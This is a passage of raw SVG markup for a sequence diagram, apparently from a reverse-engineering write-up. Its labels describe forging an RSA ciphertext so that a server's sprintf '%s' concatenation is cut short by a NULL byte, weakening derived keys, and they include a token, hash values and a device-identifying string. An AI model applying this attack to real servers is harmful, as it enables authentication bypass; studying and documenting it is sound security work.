stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 1624.963196579 L 94.84998053743945 1624.963196579 L 94.84998053743945 3312.515352879 L 73.48856083743945 3312.515352879 L 73.48856083743945 1624.963196579" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 84.16927068743945 1949.656776019 L 105.53069038743945 1949.656776019 L 105.53069038743945 3312.515352879 L 84.16927068743945 3312.515352879 L 84.16927068743945 1949.656776019" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 937.7775408266808 2186.7685346890003 L 959.1389605266808 2186.7685346890003 L 959.1389605266808 3312.515352879 L 937.7775408266808 3312.515352879 L 937.7775408266808 2186.7685346890003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 94.84998053743945 2703.714891429 L 116.21140023743945 2703.714891429 L 116.21140023743945 3312.515352879 L 94.84998053743945 3312.515352879 L 94.84998053743945 2703.714891429" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 105.53069038743945 2876.7423909990002 L 126.89211008743945 2876.7423909990002 L 126.89211008743945 3312.515352879 L 105.53069038743945 3312.515352879 L 105.53069038743945 2876.7423909990002" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 2936.5543661590004 L 969.8196703766807 2936.5543661590004 L 969.8196703766807 3312.515352879 L 948.4582506766808 3312.515352879 L 948.4582506766808 2936.5543661590004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g><g><rect fill="white" stroke="none" x="318.8757539581576" y="168.114373039" width="314.4250913686792" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="318.8757539581576" y="189.47579273899998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="318.8757539581576" y="210.83721243899998" width="330.7917543478052" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send the token "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="489.47996080964197" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ABCDEF1234</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="620.8966325625717" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="208.70107046899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="384.3299669131576" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">41424344454631323334</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="638.6632951602279" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 238.607058049 L 877.4671325403475 238.607058049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(895.0547014266808,238.607058049) translate(-895.0547014266808,-238.607058049)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 877.2535183433475 229.70646650733332 L 895.0547014266808 238.607058049 L 877.2535183433475 247.50764959066666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="952.3745109550141" y="270.649187599" width="388.8084198064844" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="292.010607299" width="437.85842571926514" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="313.372026999" width="346.8751007146875" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="334.733446699" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="356.094866399" width="474.5250946111719" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="289.87446532900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">compute MD5 hash of 128-byte buffer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">beginning with "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1119.4620552088422" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">K2_COSTDOWN__VER_3.0</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1377.828723910014" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="332.59730472900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the rest of the bytes left null.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="353.95872442900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="375.320144129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1145.9287300135297" y="375.320144129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266808 383.864712009 L 1012.5425097766808 383.864712009 L 1012.5425097766808 411.634557619 L 944.6843998630142 411.634557619" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(927.0968309766808,411.634557619) translate(-927.0968309766808,-411.634557619)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 944.8980140600141 402.7339660773334 L 927.0968309766808 411.634557619 L 944.8980140600141 420.53514916066666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="245.49111040903642" y="443.676687169" width="440.225085360531" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="245.49111040903642" y="465.038106869" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="245.49111040903642" y="486.399526569" width="488.24175129604737" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Reply with the </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="398.3953203122786" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="676.1619829099349" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="484.263384599" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="310.9453233640364" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">812B50867EFB281491D8F9285D007914</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="722.7286485593489" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 514.169372179 L 91.0761297237728 514.169372179" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(73.48856083743945,514.169372179) translate(-73.48856083743945,-514.169372179)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 91.28974392077279 505.26878063733335 L 73.48856083743945 514.169372179 L 91.28974392077279 523.0699637206667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="109.44695066577279" y="546.211501729" width="516.5750976629297" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="567.572921429" width="580.408419711117" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="588.9343411289999" width="323.79175720882813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="610.2957608289998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="631.6571805289998" width="304.6251007146875" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="653.0186002289997" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="674.3800199289997" width="560.3917633123438" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="695.7414396289996" width="535.7917572088281" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="717.1028593289996" width="512.1417633123438" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="738.4642790289995" width="67.85842667293946" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="759.8256987289994" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="781.1871184289994" width="502.4917694158594" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="802.5485381289993" width="556.4250885076563" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="823.9099578289993" width="162.65841971111695" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="845.2713775289992" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="866.6327972289992" width="653.0250640935938" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="887.9942169289991" width="630.375093085293" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="909.355636628999" width="605.3584152288477" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="930.717056328999" width="641.5584312505762" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="952.0784760289989" width="729.9917541570703" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="973.4398957289989" width="735.4084144659082" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="994.8013154289988" width="505.39176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="1016.1627351289987" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="1037.5241548289987" width="581.8917723722498" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="565.436779459" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Produce a 32-byte-long message called </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="514.0011697242884" y="565.436779459" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that the Server will decrypt with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="441.8178201149134" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="680.3011575172571" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="608.1596188589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded public key.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="629.5210385589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="650.8824582589998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Two things are essential here:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="672.2438779589997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="693.6052976589997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(1) the fate of this message is to be decrypted with the</text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">HARDCODED PUBLIC KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="394.0011697242884" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and then </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="496.2011666725306" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="543.3011651466517" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ed with a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="736.3281370589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">randomly generated secret text 31 ASCII-printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="757.6895567589995" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">bytes.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="779.0509764589995" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="800.4123961589994" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(2) the result of these two operations will then be</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="821.7738158589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">concatenated with the salt </text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="386.48450712663214" y="821.7738158589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using sprintf and the %s</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="843.1352355589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">format string</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="262.55115751725714" y="843.1352355589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="864.4966552589992" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="885.8580749589992" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If we can discover a phony ciphertext that, when decrypted with</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypy()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="354.60116056901495" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, with the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="455.2678246925501" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">HARDCODED PUBLIC KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="195.81782774430795" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="396.91783384782354" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option, yields a bytestring that</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">begins with a byte between </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="396.601175827804" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="446.5845094154505" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="496.9178414772181" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7f</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="541.2178407142786" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, then we will have a</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="971.3037537589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">1 in 92 chance of tricking the Server into generating a </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="663.4011636207728" y="971.3037537589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that begins with a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="299.7178292701868" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">NULL BYTE</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="421.10116056901495" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. This will cause </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="585.3678231666712" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="687.5011544654993" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="737.8344865272669" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1014.0265931589988" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to be nothing but hashes of their respective salts.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1035.3880128589988" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result of this search as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="444.2511697242884" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="681.78451017839" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 1065.294000439 L 169.61494948743945 1065.294000439 L 169.61494948743945 1093.063846049 L 101.7568395737728 1093.063846049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(84.16927068743945,1093.063846049) translate(-84.16927068743945,-1093.063846049)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 101.97045377077279 1084.1632545073332 L 84.16927068743945 1093.063846049 L 101.97045377077279 1101.9644375906666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="290.0994368441256" y="1125.105975599" width="399.02509842586915" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="293.3036497991256" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="350.0369833867721" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.5703238408737" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 84.16927068743945 1152.875821209 L 877.4671325403475 1152.875821209" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(895.0547014266808,1152.875821209) translate(-895.0547014266808,-1152.875821209)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 877.2535183433475 1143.9752296673332 L 895.0547014266808 1152.875821209 L 877.2535183433475 1161.7764127506666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="952.3745109550141" y="1184.917950759" width="623.2084404058496" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="1206.279370459" width="437.2417541570703" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Decrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1041.228725435893" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1278.7620658899946" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1333.89540100352" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="1225.504648189" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1148.445392611186" y="1225.504648189" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266808 1234.049216069 L 1012.5425097766808 1234.049216069 L 1012.5425097766808 1261.819061679 L 944.6843998630142 1261.819061679" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(927.0968309766808,1261.819061679) translate(-927.0968309766808,-1261.819061679)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 944.8980140600141 1252.9184701373333 L 927.0968309766808 1261.819061679 L 944.8980140600141 1270.7196532206667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1293.861191229" width="425.9917694158594" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1315.222610929" width="500.7584138937036" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1336.584030629" width="435.14176331234376" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1313.086468959" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Generate a string of 31 random, printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">characters (between ASCII codes </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1302.9260902541546" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1352.909423841801" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1403.2427559035686" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7e</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1452.8094215529827" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1355.809308359" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1198.3094368117718" y="1355.809308359" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1364.353876239 L 1023.2232196266808 